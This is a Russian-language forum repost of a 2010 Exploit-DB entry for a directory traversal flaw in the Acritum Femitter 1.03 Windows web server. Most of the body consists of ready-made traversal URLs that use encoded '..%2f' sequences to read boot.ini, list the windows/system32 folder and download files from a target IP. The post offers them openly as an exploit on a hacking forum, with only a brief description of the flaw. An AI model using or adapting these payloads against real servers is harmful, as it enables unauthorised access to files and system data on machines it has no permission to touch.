Exploit Acritum Femitter 1.03 - Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12310
Проверка EDB
  1. Пройдено
Автор
DR_IDE
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-04-20
Код:
############################################################
#
# Acritum Femitter v1.03 Directory Traversal Exploit
# Found By:             Dr_IDE
# Date:                 Apr. 20, 2010
# Tested On:            Windows 7
# Download:             http://acritum.com/fem/download.htm
#
############################################################

- Description -

Acritum Femitter v1.03 is a Windows based HTTP server. This is the latest
version of the application available.

Acritum Femitter v1.03 is vulnerable to remote directory traversal attack by the
following means.

- Technical Details -
http://[webserver IP]/[\../]

http://172.16.2.102////..%2f..%2f..%2f..%2fboot.ini                                             <- File Access
http://172.16.2.102////..%2f..%2f..%2f..%2fwindows/system32                             <- Full Directory Listing
http://172.16.2.102////..%2f..%2f..%2f..%2fwindows/system32/calc.exe    <- File Download

#[pocoftheday.blogspot.com]
 
Источник
www.exploit-db.com

Похожие темы